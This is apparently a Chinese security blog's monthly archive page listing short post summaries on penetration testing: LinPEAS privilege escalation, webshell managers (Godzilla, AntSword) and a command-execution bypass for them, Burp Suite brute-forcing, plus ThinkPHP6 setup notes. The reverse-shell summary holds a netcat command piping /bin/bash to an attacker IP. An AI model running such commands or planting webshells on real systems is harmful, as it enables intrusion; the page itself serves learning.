05 2022 档案

LinPEAS 提权
摘要:LinPEAS - Linux Privilege Escalation Awesome Script linxu 提权脚本 https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 直接使用: CVEs Check Vulnerable 阅读全文

posted @ 2022-05-31 17:27 katago 阅读(1861) 评论(0) 推荐(0) 编辑

反弹Shell,看这一篇就够了
摘要:https://xz.aliyun.com/t/9488 攻击机开启本地监听: netcat -lvvp 2333 目标机主动连接攻击机: netcat 47.xxx.xxx.187 2333 -e /bin/bash # nc <攻击机IP> <攻击机监听的端口> -e /bin/bash bas 阅读全文

posted @ 2022-05-31 17:01 katago 阅读(58) 评论(0) 推荐(0) 编辑

哥斯拉Godzilla Shell管理工具
摘要:https://www.freebuf.com/sectool/247104.html https://github.com/BeichenDream/Godzilla Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看) https://blog.csdn.net/weixin_54161921 阅读全文

posted @ 2022-05-31 16:17 katago 阅读(564) 评论(0) 推荐(1) 编辑

thinkphp6 数据库
摘要:https://www.kancloud.cn/a173512/thinkphp6/2452937 数据库配置 config\database.php 文件里面 // 服务器地址 'hostname' => env('database.hostname', '127.0.0.1'), // 数据库名 阅读全文

posted @ 2022-05-23 17:47 katago 阅读(82) 评论(0) 推荐(0) 编辑

模板视图相关
摘要:https://www.kancloud.cn/a173512/thinkphp6/2452918 安装视图 cd /var/www/html/tp6 composer require topthink/think-view 模板位置 模板渲染 name: {$name} <br> email: { 阅读全文

posted @ 2022-05-23 17:20 katago 阅读(24) 评论(0) 推荐(0) 编辑

thinkphp6 文档记录
摘要:https://www.kancloud.cn/manual/thinkphp6_0 架构:https://www.kancloud.cn/manual/thinkphp6_0/1037486 ThinkPHP支持传统的MVC 控制器 URL设计 控制器的修改: https://www.bilibi 阅读全文

posted @ 2022-05-23 16:26 katago 阅读(135) 评论(0) 推荐(0) 编辑

ubuntu18.04安装ThinkPHP6
摘要:一、安装Lamp环境所需应用(apache、mysql、php) 创建项目 sudo chmod -R 777 /var/www/html cd /var/www/html composer create-project topthink/think tp6 启动项目(测试) php think r 阅读全文

posted @ 2022-05-23 13:48 katago 阅读(190) 评论(0) 推荐(0) 编辑

一些有趣的chrome 插件
摘要:用chrome插件实现cookie同步 https://blog.csdn.net/u013613428/article/details/93192961 写一个chrome插件来实现网站的自动登录 https://juejin.cn/post/6844903501965819918 https:/ 阅读全文

posted @ 2022-05-20 16:14 katago 阅读(25) 评论(0) 推荐(0) 编辑

挖洞思路
摘要:1、搜集站点信息,判断操作系统,语言, 程序框架 thinkphp, 什么cms之类的 2、google 搜索 cms 漏洞 , CVE 是通用漏洞披露(Common Vulnerabilities and Exposures) 阅读全文

posted @ 2022-05-13 16:53 katago 阅读(43) 评论(0) 推荐(0) 编辑

蚁剑菜刀虚拟终端执行命令返回ret=127之bypass
摘要:当我们成功上传到网站一句话木马的时候发现无法在虚拟终端执行命令。发现大神有做此问题的bypass,在此复现一下。 虚拟终端出现ret=127 然后我们从Github上下载bypass的两个关键文件,地址点我. 将这两个文件上传到目标站点目录下,推荐根目录 然后我们需要在当前目录下建个临时目录,存放临 阅读全文

posted @ 2022-05-13 16:20 katago 阅读(3767) 评论(0) 推荐(0) 编辑

渗透工具:蚁剑(AntSword)教学
摘要:https://www.freebuf.com/articles/web/270488.html 阅读全文

posted @ 2022-05-12 17:12 katago 阅读(194) 评论(0) 推荐(0) 编辑

Burp Suite爆破Basic认证密码
摘要:https://writeup.ctfhub.com/Skill/Web/Web%E5%89%8D%E7%BD%AE%E6%8A%80%E8%83%BD/HTTP%E5%8D%8F%E8%AE%AE/3mSzAzbGydVT74nsq1gcVj.html https://www.ctfhub.com 阅读全文

posted @ 2022-05-12 16:13 katago 阅读(41) 评论(0) 推荐(0) 编辑

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示